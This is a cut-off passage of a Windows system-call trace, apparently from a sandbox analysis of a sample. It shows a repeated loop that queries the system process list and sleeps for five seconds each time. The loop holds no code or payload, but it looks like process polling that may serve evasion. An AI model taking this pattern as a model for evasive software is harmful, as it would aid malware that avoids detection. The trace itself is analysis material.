NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.825] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.832] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.833] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.836] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.837] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.838] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.844] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.845] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.846] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.847] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.851] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.852] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.854] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.855] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.855] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.860] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.861] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.862] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.863] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.864] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.870] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.871] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.872] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.873] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.873] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.874] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.879] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.879] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.881] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.881] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.882] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.882] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.888] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.889] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.890] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.890] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.891] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.892] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.892] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.898] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.899] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.901] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.902] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.902] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.903] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.907] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.908] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.985] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.986] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.986] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.987] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.990] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0232.991] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0232.993] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0232.993] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0232.994] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0232.995] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0232.995] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0232.999] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.000] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.001] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.002] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.003] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.003] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.003] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.007] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.009] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.010] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.010] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.011] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.012] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.012] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.016] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.017] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.018] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.020] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.020] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.020] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.023] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.024] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.025] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.026] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.026] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.027] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.027] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.031] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.032] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.033] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.034] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.034] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.034] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.035] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.038] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.039] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.041] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.041] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.042] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.042] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.042] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.048] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.049] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.051] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.052] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.052] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.055] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.056] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.057] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.057] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.058] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.058] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.058] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.062] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.063] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.064] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.064] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.065] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.065] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.065] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.069] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.070] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.071] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.072] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.072] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.076] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.077] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.079] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, 